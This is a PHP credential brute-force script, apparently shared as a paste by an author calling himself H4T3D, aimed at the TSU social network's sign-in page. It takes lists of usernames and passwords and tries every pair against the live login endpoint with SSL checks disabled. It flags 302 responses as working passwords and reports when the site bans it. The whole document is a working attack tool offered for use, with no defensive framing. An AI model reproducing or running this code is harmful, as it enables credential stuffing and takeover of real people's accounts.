TSU Private Bruteforce - H4T3D

1. <?php
2. #########################################
3. #TSU (Social Platform Like Facebook) Bruteforce
4. #Coded By H4T3D
5. #Can Check Large Number Of Emails and Passwords
6. #Changing name wont make You Coder
7. #img >> http://postimg.org/image/lihljiduj/
8. #Tutorial >> https://youtu.be/_0jjgIMXhFA
9. ###########################################
10.  
11. ob_start();
12. @set_time_limit(0);
13. error_reporting(0);
14.  
15.  
16. echo "
17. <head>
18. <form method='POST'>
19. </head>
20. <style>
21. html, body{
22.        background:#000000;
23.        color:#00FF00;
24.        font-family:monospace;
25.        height: 100%;
26.        text-decoration:  none;
27. }
28.  
29. textarea {
30.        background:#000000;
31.        resize:none;
32.        color: #00FF00 ;
33.        border:1px solid red ;
34.        border: 4px solid red ;
35. }
36. input {
37.     color: ##33CCFF;
38.     border:1px dotted #33CCFF;
39. }
40. </style>";
41.  
42. echo "
43. <center><h1>TSU - Priv8 BruteForce - H4T3D</h1></center>
44. <p dir='ltr' align='center'>
45. <textarea cols='22' class='area'  rows='14' name='username' placeholder='username'></textarea>
46. <textarea cols='22' class='area'  rows='14' name='password' placeholder='password'></textarea><br>
47. <br>
48. <input type='submit' name='scan' value='Start BruT3Force'><br></p>";
49. if(isset($_POST['scan'])){
50. function brute($user,$pass){
51.     $ch = curl_init();      
52.     curl_setopt($ch, CURLOPT_URL, "https://www.tsu.co/users/sign_in");
53.     curl_setopt($ch, CURLOPT_HEADER, 1);
54.     curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
55.     curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
56.     curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
57.     curl_setopt($ch, CURLOPT_POSTFIELDS, "utf8=&#x2713;&authenticity_token=IHB/hEFaTk9ZLmoog236KJy8Qv14bmBvCXjehO0vqowvcoOZ4TpfXRaoHZpcDd0fd8yeBuJzVyZQdmcaDwT9MQ==&user[login]=$user&user[password]=$pass&user[remember_me]=1&commit=Sign In");
58.     curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
59.     $login = curl_exec($ch);
60.     $check = (eregi('HTTP/1.1 302 Found
61. ',$login)) ? true:false;
62.     $check2 = (eregi('HTTP/1.1 503',$login)) ? true:false;
63.     if($check == true){
64.         echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It :) || Username: <font color='green'>$user</font>&nbsp; Password : <font color='green'>$pass</font></font></p>";
65.          flush();@ob_flush();   }
66.  
67. elseif($check2 == true){
68.         die ("<p align='center' dir='ltr'><font face='Arial Black' size='2'>Security Banned Please Remove Cookies and Try Again :(</font></p>");
69.          flush();@ob_flush();   }
70.  
71.  
72. else{
73.         echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one -_- || Username : <font color='red'>$user</font>&nbsp;  Password : <font color='red'>$pass</font></font></p>";
74.  
75.                 flush();@ob_flush();          }
76. }            
77.  
78.  
79.  
80.    
81.     $username = explode("\n", $_POST['username']);
82.     $password = explode("\n", $_POST['password']);
83.    
84.    
85. foreach($username as $users) {
86.     $users = @trim($users);
87.     foreach($password as $pass) {
88.         $pass = @trim($pass);
89.         echo brute($users,$pass);
90.     }
91.  
92. }
93.  
94. }
95. echo"<br>
96. <br>
97. <br>
98. <br>
99. <center><p><b><font size='2' face='Trebuchet MS' color='#FFFFFF'>Coded BY H4T3D http://pastebin.com/u/H4T3D</font></b></p></center>";
100. ob_end_flush();
101. ?>